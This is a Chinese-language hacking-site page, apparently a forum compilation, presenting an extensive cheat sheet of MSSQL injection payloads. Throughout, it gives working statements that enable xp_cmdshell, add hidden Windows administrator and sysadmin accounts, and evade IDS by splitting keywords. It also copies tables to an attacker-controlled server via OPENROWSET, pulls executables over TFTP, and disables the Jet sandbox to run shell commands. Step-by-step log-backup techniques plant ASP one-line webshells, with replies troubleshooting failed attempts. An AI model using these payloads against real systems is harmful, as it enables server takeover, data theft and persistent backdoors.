久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當前位置:首頁 >> 網站漏洞 >> SQL注入 >> SQL 注入語句 上

SQL 注入語句 上

yupang SQL注入 715
sql 注入語句大全
--是否存在 xp_cmdshell 
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 
--用 xp_cmdshell 執行命令
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup name administrators /add"--
--查看權限
and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //sa 
and (select IS_MEMBER('db_owner'))=1-- // dbo 
and (select IS_MEMBER('public'))=1-- //public 
--創建個登陸 mssql 的帳號
;exec master.dbo.sp_addlogin name,pass;--
--把創建的 mssql 登陸帳號提升到 sysadmin 
;exec master.dbo.sp_addsrvrolemember name,sysadmin;--
有用的擴展
--獲得 MS SQL 的版本號 //mssql 版本
execute master..sp_msgetversion // dbo public 
--得到硬盤文件信息 //dbo public 
--參數說明:目錄名,目錄深度,是否顯示文件 //讀取磁盤目錄和文件
execute master..xp_dirtree 'c:' //列出所有 c:\文件和目錄,子目錄
execute master..xp_dirtree 'c:',1 //只列 c:\文件夾
execute master..xp_dirtree 'c:',1,1 //列 c:\文件夾加文件
--列出服務器上所有 windows 本地組
execute master..xp_enumgroups //dbo 
--得到當前 sql server 服務器的計算機名稱 //獲得計算機名 
execute master..xp_getnetname //dbo public 
--列出指定目錄的所有下一級子目錄
EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT' //可以列目錄
--列出服務器上固定驅動器,以及每個驅動器的可用空間
execute master..xp_fixeddrives //dbo public 
--顯示系統上可用的盤符
execute master..xp_availablemedia //dbo 
--獲取某文件的相關屬性
execute master..xp_getfiledetails 'C:1.txt' //dbo public 
--統計數據庫里每個表的詳細情況
exec sp_MSforeachtable 'sp_spaceused ''?''' //查詢表 //dbo public 
--獲得每個表的記錄數和容量
exec sp_MSforeachtable 'select ''?''','?', 'sp_spaceused ''?''', 'SELECT count(*) FROM ? ' //d
bo pubilc 
--更新 Table1/Table2 中 note 列為 NULL 的值
sp_MSforeachtable 'Update ? Set note='''' Where note is null',null,null,null,' AND o.name in ('
'Table1'',''Table2'') 
--列出服務器域名
xp_ntsec_enumdomains //機器名 //dbo public 
--停止或者啟動某個服務
xp_servicecontrol 'stop','schedule' //schedule 是服務得名稱 //dbo 
--用 pid 來停止某個執行中的程序
xp_terminate_process 123 //123 是 pid //dbo 
--只列某個目錄下的子目錄
dbo.xp_subdirs 'C:' //dbo 
--服務器安全模式信息
xp_loginconfig //dbo 
xp_regaddmultistring 
xp_regdeletekey
xp_regdeletevalue 
xp_regenumkeys 
xp_regenumvalues 
xp_regread 
xp_regremovemultistring 
xp_regwrite 
--將新擴展存儲過程的名稱注冊到 Microsoft? SQL Server? 上。
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' //恢復 xp_cmdshell 
恢復過程 sp_addextendedproc 如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call */ 
@dllname varchar(255)/* name of DLL containing function */ 
as 
set implicit_transactions off 
if @@trancount > 0 
begin 
raiserror(15002,-1,-1,'sp_addextendedproc') 
return (1) 
end 
dbcc addextendedproc( @functname, @dllname) 
return (0) -- sp_addextendedproc 
創建新的 Microsoft? SQL Server? 登錄//只有 sysadmin 和 securityadmin 固定服務器角色的成員才可以執行
 sp_addlogin。
補丁版本
 其中的 8.00.760 就是 SQL Server 的版本和補丁號。對應關系如下:
 8.00.194 -——————SQL Server 2000 RTM 
 8.00.384 -——————(SP1) 
 8.00.534 -——————(SP2) 
 8.00.760 -——————(SP3)
在 db 權限并且分離獲取 mssql 數據庫服務器 ip 的方法
1.本地 nc 監聽 nc -vvlp 80
2.;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的 ip,80;', 'se
lect * from dest_table') select * from src_table;--
其他的都不用管
xp_cmdshell 的刪除及恢復
恢復 xp_cmdshell 的方法 
刪除擴展存儲過過程 xp_cmdshell 的語句 
exec sp_dropextendedproc ’xp_cmdshell’ 
恢復 cmdshell 的 sql 語句 
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ 
exec master.dbo.addextendedproc ’xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sys
objects where xtype=’x’ and 
返回結果為 1 就 ok 
否則需上傳 c:\inetput\web\xplog70.dll 后 
exec master.dbo.sp_addextendedproc ’xp_cmdshell’,’c:\inetput\web\xplog70.dll’;-- 
如果是用以下方法刪除 
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc ’xp_cmdshell’ 
則可以用以下語句恢復 
dbcc addextendedproc ("sp_oacreate","odsole70.dll") 
dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 
這樣可以直接恢復,不用去管 sp_addextendedproc 是不是存在
去掉 tenlnet 的 ntlm 認證
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
public 權限列目錄
提起 public 權限的用戶估計很多人也覺得郁悶了吧~N 久以前看了一篇《論在 mssql 中 public 和 db_owner 權限下拿
到 webshell 或是系統權限》的文章(名字真長-_-!!!),里面說到沒辦法利用 xp_regread,xp_dirtree…這些存儲過
程,原因是 public沒有辦法建表,我在這里矯正一下其實 public是可以建表的~呵呵,使這些存儲過程能利用上,看下面
的代碼吧
--建立一個臨時表,一般的表我們是無辦法建立的,我們只能建立臨時表
create table ##nonamed( 
 dir ntext, 
 num int
 ) 
--調用存儲過程把執行回來的數據存到臨時表里面
insert ##nonamed execute master..xp_dirtree 'c:\',1 
--然后采用 openrowset 函數把臨時表的數據導到本地 MSSQL 的 dirtree 表里面了
insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirt
ree') 
select * from ##nonamed 
以上方法,也就是說 public 可以遍歷用戶服務器的目錄
MSSQL 自身存儲過程的一個注入
master..sp_resolve_logins 存儲過程中,對@dest_path 參數過濾不嚴,導致 xp_cmdshell 注入。
分析:
SELECT @dest_path = RTRIM(LTRIM(@dest_path)) 
-- If the last char is '\', remove it. 
IF substring(@dest_path, len(@dest_path),1) = '\' 
SELECT @dest_path = substring(@dest_path, 1, len(@dest_path)-1) 
-- Don't do validation if it is a UNC path due to security problem. 
-- If the server is started as a service using local system account, we 
-- don't have access to the UNC path. 
IF substring(@dest_path, 1,2) <> '\\' 
BEGIN 
SELECT @command = 'dir "' + @dest_path + '"' 
exec @retcode = master..xp_cmdshell @command, 'no_output' 
IF @@error <> 0 
RETURN (1) 
IF @retcode <> 0 
BEGIN 
raiserror (14430, 16, -1, @dest_path) 
RETURN (1) 
END 
END 
master..sp_resolve_logins 存儲過程 在這一段,經過一定的判斷,對 @dest_path 進行了一定的過濾。
但是沒有過濾"(雙引號)導致了 xp_cmdshell 執行任意 SQL 語句
測試代碼:
EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrato
rs admina /add&dir "e:\asp', '1.asp' 
執行上述 MSSQL 語句,成功添加了一個名為 admina 的系統帳號
但是此存儲過程代碼中經過判斷,需要系統 systemadmin 權限的帳號
Re:沙盒
通常一臺 MSSQL 服務器同時支持 Access 數據庫,所以只要有一個 sa 或者 dbowner 的連接(至少對 master 庫具有 db_
owner 權限,默認情況下是沒有的),就滿足了修改注冊表的條件,因為 MSSQL 有一個名為 xp_regwrite 的擴展,它的作
用是修改注冊表的值.語法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value 
如果存在一個 sa 或者 dbowner 的連接的 SQL 注入點,就可以構造出如下注入語句 InjectionURL;EXEC master.dbo.
xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD
','0'--那我們將 SandBoxMode 開關的注冊表值修改為 0 就成功了.接著連接到一個 Access 數 據庫中,就可以執行系
統命令,當然執行系統命令我們只需要一個 Access 數據庫相關 Select 的注入點或者直接用 ASP 文件 Select 調用這個
 VBA 的 shell()函數,但是實際上 MSSQL 有一個的 OpenRowSet 函數,它的作用是打開一個特殊的數據庫或者連接到另
一個數據庫之中.當我 們有一個 SA 權限連接的時候,就可以做到打開 Jet 引擎連接到一個 Access 數據庫,同時我們搜
索系統文件會發現 windows 系統目錄下本身就存在兩 個 Access 數據庫,位置在%windir%\system32\ias\ias.mdb
或者%windir%\system32\ias\ dnary.mdb,這樣一來我們又可以利用 OpenRowSet 函數構造出如下注入語句:Inject
ionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ia
s.mdb','select shell("net user ray 123 /ad")');--
如果你覺得不大好懂的話,我可以給你做一個簡化的理解:1,Access 可以調用 VBS 的函數,以 System 權限執行任意
命令 2,Access 執行這個命令是有條件的,需要一個開關被打開 3,這個開關在注冊表里 4,SA 是有權限寫注冊表的 5, 用 SA 寫注冊表的權限打開那個開關 6,調用 Access 里的執行命令方法,以 system 權限執行任意命令執行 SQL 命令,
執行了以下命令:EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Eng
ine','SandBoxMode','REG_DWORD','0'Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databas
e=c:\windows\system32\ias\ias.mdb','select shell("net user zyqq 123 /add")');Select * From Open
RowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("ne
t localgroup administrators 
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WH
ERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WH
ERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
看服務器打的補丁=出錯了打了 SP4 補丁
and 1=(select @@VERSION)--
看數據庫連接賬號的權限,返回正常,證明是服務器角色 sysadmin 權限。
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
判斷連接數據庫帳號。(采用 SA 賬號連接 返回正常=證明了連接賬號是 SA)
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
看 xp_cmdshell 是否刪除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')--
xp_cmdshell 被刪除,恢復,支持絕對路徑的恢復
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
反向 PING 自己實驗
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NU
LL,"cmd.exe /c ping 192.168.0.1";--
加帳號
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run
',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
創建一個虛擬目錄 E 盤:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' csc
ript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默認 Web 站點" -v "e","e:\"'--
訪問屬性:(配合寫入一個 webshell)
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscr
ipt.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' 
爆庫 特殊技巧::%5c='\' 或者把/和\ 修改%5 提交
and 0<>(select top 1 paths from newtable)--
得到庫名(從 1 到 5 都是系統的 id,6 以上才可以判斷)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
依次提交 dbid = 7,8,9.... 得到更多的數據庫名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一個表 假設為 admin 
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 來
得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' 
and uid>(str(id))) 暴到 UID 的數值假設為 18779569 uid=id 
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個 admin 的一個字段,假
設為 user_id 
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in 
('id',...)) 來暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名
依次可以得到密碼。。。。。假設存在 user_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address')) 
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(i
d))) 判斷 id 值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access 也好用) 
得到 WEB 路徑
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec 
master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SV
C\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) valu
es(@test)--
;use ku1;--
;create table cmd (str image);-- 建立 image 類型的表 cmd 
存在 xp_cmdshell 的測試過程:
;exec master..xp_cmdshell 'dir' 
;exec master.dbo.sp_addlogin jiaoniang$;-- 加 SQL 帳號
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordc
hg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start', 'schedule' 啟動服務
exec master..xp_servicecontrol 'start', 'server' 
; DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'ru
n',null, 'C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add' 
;DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run
',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add' 
'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用 TFTP 上傳文件
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\' 
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' 
;declare @a;set @a=db_name();backup database @a to disk='你的 IP 你的共享目錄 bak.dat' 
如果被限制則可以。
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlog
in hax') 
查詢構造:
SELECT * FROM news WHERE id=... AND topic=... AND ..... 
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)
='1') and userpass <>' 
select 123;--
;use master;--
:a' or name like 'fff%';-- 顯示有一個叫 ffff 的用戶哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) wher
e name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where
 name='ffff';--
';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110)
 where name='ffff';--
';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
上面的語句是得到數據庫中的第一個用戶表,并把表名放在 ffff 用戶的郵箱字段中。
通過查看 ffff 的用戶資料可得第一個用表叫 ad 
然后根據表名 ad 得到這個表的 ID 得到第二個表的名字
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x
63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, 'admin''--', 'password', 0xffff)--
;and user>0 
;and (select count(*) from sysobjects)>0 
;and (select count(*) from mysysobjects)>0 //為 access 數據庫
枚舉出數據表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
這是將第一個表名更新到 aaa 的字段處。
讀出第一個表,第二個表可以這樣讀出來(在條件后加上 and name<>'剛才得到的表名')。
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'
vote');--
然后 id=1552 and exists(select * from aaa where aaa>5) 
讀出第二個表,一個個的讀出,直到沒有為止。
讀字段是這樣:
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后 id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后 id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名
[獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名] 
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'
你得到的表名' 查出一個加一個]) [ where 條件] select top 1 name from sysobjects where xtype=u and s
tatus>0 and name not in('table1','table2',…) 
通過 SQLSERVER 注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是 SYSADMIN 組] 
[獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名] 
update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數據表名'),字段列如:1) [ where 條 件] 
繞過 IDS 的檢測[使用變量] 
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\' 
1、 開啟遠程數據庫
基本語法
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1'
 ) 
參數: (1) OLEDB Provider name 
2、 其中連接字符串參數可以是任何端口用來連接,比如
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,143
3;', 'select * from table' 
3.復制目標主機的整個數據庫 insert 所有遠程表到本地表。
基本語法:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', 'select * from table1') 
select * from table2 
這行語句將目標主機上 table2 表中的所有數據復制到遠程數據庫中的 table1 表中。實際運用中適當修改連接字符串
的 IP 地址和端口,指向需要的地方,比如:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;',
'select * from table1') select * from table2 
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;',
'select * from _sysdatabases') 
sele
Re:log 備份的總結
當 SQL 注入是得到 DB 權限時候,接下來可以做的工作很多,象找管理員密碼,后臺管理這些都可以幫助你拿到 WEBSH
ELL,但是這篇文章講的是 log 備份,LOG 備份出來的小馬的體積小,而且備份的成功的可性很大,所以是我作為對 DB 權
限的第一種試探方法. 
但是在 LOG 備份中,我們經常會遇到一些很讓我們頭痛的問題,那就是閉合的問題,我在這里做個總結,也
好讓我們對不能閉合的方法有一個全面的了解. 
1.先介紹下 LOG 備份,這個相信大家都很熟悉了,我還是習慣在 IE 里直接提交,返回正常的頁面就說這一步的操作就
成功了,如果沒有返回正常的頁面,我們就可以根據IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),
LOG 的格式如下所示: 
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL 
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:\cmd' with init 
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%25Execute(request("go"))% %2
5>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:\xxx\xxx\asp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--
分為 6 步操作,最容易出錯的就是第 4 步的操作,經常返回沒有閉合的問題,下面就是一些我們可以將
values 中的內容可以進行更換的方式,當我們的一種方式不行的話,就可以換另一種方式,當所有的方式
都換完了,沒有什么好說的,要么就放棄,要么就換另一種方式繼續,想列目錄找數據庫下載,后臺.這
里就不多說了,可以提換的內容有: 
a).<%%25Execute(request("go"))%%25> 
b).<%Execute(request("go"))%> 
c).%><%execute request("go")%><% 
d).<script language=VBScript runat=server>execute request("sb")</Script> 
e).<%25Execute(request("l"))%25> 
2.LOG 備份要注意的一些問題: 
a).要注意你現在的機器是不是 WEB 主機,簡單的方法就是翻他的目錄,看有沒有 IIS 安裝的文件
b).當你確定你要找的確實是 WEN 主機時,就可以找他的站點目錄了,這個也很重要,是步驟 5 的操作,如果備份到一個
錯誤的目錄,當然就沒有辦法訪問了
c).備份成功后,你就可以試著用客戶端去連接,這個地方也有人弄錯,現在用的字段是 go,你的客戶端的
相關字段也為 go 
d).用 ececute 正常備份出來的是用錯誤提示的,當你的顯示 500 錯誤時,請你將的 IE 錯誤提示打開,當顯示
Microsoft VBScript 運行時錯誤 錯誤 '800a000d' 
類型不匹配: 'execute' 
時候表示你已經成功了,連接吧!! 
e).還有極端的時候你備份出來的一句話被殺(當你確定你確實是備份在 WEB 主機的對應目錄是),你可以將
上面的 VALUES 字段中的值做幾個大小寫轉換,一般是沒有問題的.. 
------------------------------------------------------------------------
今天測試 log 備份獲取 WEBSEHLL 遇到點問題,首先說下我自己理解通過 log 備份和差異備份的區別(不對和不完善的
請大家指出與補充)。LOG 備份得到的 WEBSHELL 文件小,大大增加了成功率。避免了數據庫里有特殊字符備份不成功
的情況。今天在測試是沒成功,備份出來沒有一句話馬,功能失去了,也就沒有任何意義了。提交上來討論下錯誤之處。
由于是議題討論。用了真實地址,請勿破壞!
以下是我的語句:
引用內容
;alter database dweb set RECOVERY FULL--
;create table cmd (a image)--
;backup log dweb to disk = ‘c:\Sammy‘ with init--
;insert into cmd (a) values (‘0x3C256576616C20726571756573742822732229253E‘)--
;backup log dweb to disk = ‘d:\chen\s2.asp‘--
備份結果
http://www.site.com/s2.asp 
十六進制形式備份出來了!
我再用如下語句! 引用內容
;Drop table [cmd]--
;alter database dweb set RECOVERY FULL--
;create table cmd (a image)--
;backup log dweb to disk = ‘c:\Sammy‘ with init--
;insert into cmd (a) values (‘<%eval request("s")%>‘)--
;backup log dweb to disk = ‘d:\chen\sssjjk.asp‘--
如果又如下
http://www.site.com/sssjjk.asp 
是何原因使 LOG 備份不成功呢?
是因為數據表沒有寫到你備份的數據庫當中,導致備份的 ASP 文件中沒有寫入我們希望的一句話木馬,請在和數據表操
作相關的語句中加入數據庫名,如:create table dweb.dbo.[cmd] (a image)--,然后再執行備份語句就可以成功
了
呵呵,你把馬改成"<%%25Execute(request("s"))%%25>" 來試試.. 
注意,是加個.%25 
問題已解決,把語句換成!
;insert into cmd (a) values (‘<%%25eval request("s")%%25>‘)--
確實能成功!謝謝!
;insert into cmd (a) values (‘0x3C256576616C20726571756573742822732229253E‘)--
樓主的這句是寫 字符串 “0x3C256576616C20726571756573742822732229253E”到文件里 而不是木馬
把單引號去掉就可以了
insert into cmd (a) values (0x3C256576616C20726571756573742822732229253E)--
…………………………………………………………………………………………………………
Blog 被人滲透了一下,不知道各位掉了什么東西沒有。原來有一次 blog 的目錄可以列出來,那次我掉了一個小東西,
然后今天別人告訴我 NBSI 3 用了那個東西的方法……呵呵,有點暈,就是下面的,成功率還是很高的,大家可以試試
看。嗯,方法流出去無所謂,文章留著吧。
 dbowner 通過注射得到一個 shell 應該不是什么難事情了,比較麻煩的是就算利用增量備份,仍然有很多不確定的
因素,如果之前別人有過什么錯誤的寫入信息,可能備份出來得到的還是一些不能用的 500 錯誤,如何能夠提高成功率
及重用性呢?如果單從調整增量備份的方式來看,盡管能夠達到一些效果,但是方法比較復雜而且效果不明顯。加上關
于重用性的考慮,例如多次備份的成功率,backup database 的方法并不太適用。這里將要講述的是另外一個備份的
方法,導出日志文件到 web 目錄來獲得 shell。
 飯要一口一口的吃,技術問題也要一個一個的解決,得到 webshell 首先要知道物理路徑,然后才能說其他的。關
于物理路徑的暴露有很多方法,注入也可以得到,這點 nbsi2 已經做到了,就不再多說。值得注意的是,如果數據庫和
web 分離,這樣肯定得不到 webshell,備份出來的東西可以覆蓋任何文件,一些關于開始菜單的想法還是有效的,只
要注意擴展名就好。扯遠了,反正如果數據庫和 web 在一塊的,你就有機會,反之還是想其他的辦法吧。
 然后你要得到當前的權限和數據庫名。如果是 sysadmin 當然沒有必要做很復雜的事情,dbowner 足矣,public
則不行。當前打開的庫名用一個 db_name()就可以得到,同樣很簡單。
 默認的情況是,一般選擇的數據庫故障還原類型都是簡單,這時候不能夠對日志文件進行備份。然而我們都是 dbo
wner 了,還有什么不能做的呢,只要修改一下屬性就可以。由于不能去企業管理器中修改,只有用一段 SQL 語句,很
簡單的,這樣就可以:
 alter database XXXX set RECOVERY FULL 
 其中 XXXX 是你得到的數據庫的名字,執行過后就可以備份日志了。這種修改是破壞性的,因為你不知道以前的故
障還原模式是什么,細心的管理員看到異樣,可能就要開始起疑心。如果之前你能得到數據庫的狀態,最好還是在備份
完以后把這個數據庫的屬性改回來。
 剩下的事情就是怎樣讓數據庫用最原始的方式記錄下你的數據了。這一點和 backup database 中設定表名為 imag
e 的問題相對應,如果你只是建立一個之類的表,日志里面的記錄還是以松散的格式記錄的,也就是< % % >,沒有任
何效果。通過實際的測試,發現還是可以通過與 backup database 類似的方式記錄進去,如下:
 create table cmd (a image) 
 insert into cmd (a) values (’’) 
 backup log XXXX to disk = ’c:\xxx\2.asp’
 這樣你已經得到一個 webshell 了。
 到這里就完了么?沒有,呵呵,我們繼續。
到這里有兩個分支方向,第一個,讓注入的時候不出現單引號,太簡單了,我都懶得寫;第二個,減小這個 webshell
的長度以及提高成功率。下面的方法就是討論第二個分支問題的,同樣適用于 backup database 的減小。
 首先是初始化這個日志。
 backup log XXXX to disk = ’c:\caonima’ with init 
 這樣有點類似于增量備份的第一步,不過有點不同的是,你做了這個以后,你備份出來的可用的 shell 是固定的。
這一點比較重要,因為有了這一步,不管管理員在數據庫里面做了什么擾亂你 back database 的手腳,或者你之前有
多少混蛋(你肯定會這么想的)弄了些你不喜歡的東西,都沒有關系,甚至你做過以后,別人在后面再按照你的方法來
一次,還是會成功,這對于偶爾出現的反復,比如對方機器重裝但是數據庫和代碼沒變,有不小的幫助。
 然后是調整一下 backup 中各個語句的順序。通過第一點,大概的步驟已經確定下來了,那就是:
 引用內容
 alter database XXXX set RECOVERY FULL 
 backup log XXXX to disk = ’c:\Sammy’ with init
 create table cmd (a image) 
 insert into cmd (a) values (’’) 
 backup log XXXX to disk = ’c:\xxx\2.asp’
 這樣不好,感覺上多了一條沒用的東西。
 create table cmd (a image) 
 確實有點討厭,不過這句是必要的,只好調整一下位置,弄到其他地方去。調換一下順序似乎還可以小一點,對于
backup database 中的增量情況同樣是可以的,backup database 甚至可以僅僅在 update 后馬上備份,不過由于涉
及到了數據的存儲格式,情況很復雜,這里不討論。調整后的是:
 引用內容
 alter database XXXX set RECOVERY FULL 
 create table cmd (a image) 
 backup log XXXX to disk = ’c:\Sammy’ with init 
 insert into cmd (a) values (’’) 
 backup log XXXX to disk = ’c:\xxx\2.asp’
 成功的話,備份出來的 shell(上面的 2.asp)有 78.5k,文件長度固定的是 80,384 字節。很挑剔的朋友也可以
接受了吧,當然用這個來生成一個干凈的木馬也可以——這本來就是頂端 cs 木馬的 s 端,很通用的。
顯示所有固定數據庫角色的權限。
EXEC sp_dbfixedrolepermission
Sql 注射總結(早源于'or'1'='1)
 最重要的表名:
 select * from sysobjects 
 sysobjects ncsysobjects 
 sysindexes tsysindexes 
 syscolumns 
 systypes 
 sysusers 
 sysdatabases 
 sysxlogins 
 sysprocesses 
 最重要的一些用戶名(默認 sql 數據庫中存在著的)
 public 
 dbo
 guest(一般禁止,或者沒權限) 
 db_sercurityadmin 
 ab_dlladmin 
 一些默認擴展
 xp_regaddmultistring 
 xp_regdeletekey 
 xp_regdeletevalue 
 xp_regenumkeys 
 xp_regenumvalues 
 xp_regread 
 xp_regremovemultistring 
 xp_regwrite 
 xp_availablemedia 驅動器相關
 xp_dirtree 目錄
 xp_enumdsn ODBC 連接
 xp_loginconfig 服務器安全模式信息
 xp_makecab 創建壓縮卷
 xp_ntsec_enumdomains domain 信息
 xp_terminate_process 終端進程,給出一個 PID 
 例如:
 sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' 
 exec xp_webserver 
 sp_dropextendedproc 'xp_webserver' 
 bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Us
a -Pfoobar 
 ' group by users.id having 1=1-
 ' group by users.id, users.username, users.password, users.privs having 1=1-
 '; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
